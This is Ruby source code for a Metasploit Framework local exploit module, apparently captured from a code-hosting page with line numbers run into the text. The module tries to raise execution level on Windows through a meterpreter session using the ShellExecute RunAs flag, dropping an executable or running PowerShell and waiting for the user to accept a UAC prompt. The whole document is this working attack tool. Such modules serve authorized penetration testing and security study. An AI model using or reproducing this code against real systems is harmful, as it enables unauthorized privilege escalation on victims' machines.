Path: blob/master/modules/exploits/windows/local/ask.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Post::Windows::Priv9include Post::Windows::Runas1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Windows Escalate UAC Execute RunAs',16'Description' => %q{17This module will attempt to elevate execution level using18the ShellExecute undocumented RunAs flag to bypass low19UAC settings.20},21'License' => MSF_LICENSE,22'Author' => [23'mubix', # Original technique24'b00stfr3ak' # Added powershell option25],26'Platform' => ['win'],27'SessionTypes' => ['meterpreter'],28'Targets' => [['Windows', {}]],29'DefaultTarget' => 0,30'DisclosureDate' => '2012-01-03',31'Notes' => {32'Reliability' => UNKNOWN_RELIABILITY,33'Stability' => UNKNOWN_STABILITY,34'SideEffects' => UNKNOWN_SIDE_EFFECTS35}36)37)3839register_options([40OptString.new('FILENAME', [false, 'File name on disk']),41OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),42OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),43])44end4546def exploit47if is_uac_enabled?48print_status 'UAC is Enabled, checking level...'49case get_uac_level50when UAC_NO_PROMPT51print_good 'UAC is not enabled, no prompt for the user'52else53print_status "The user will be prompted, wait for them to click 'Ok'"54end55else56print_good 'UAC is not enabled, no prompt for the user'57end5859case datastore['TECHNIQUE']60when 'EXE'61shell_execute_exe(datastore['FILENAME'], datastore['PATH'])62when 'PSH'63shell_execute_psh64end65end66end676869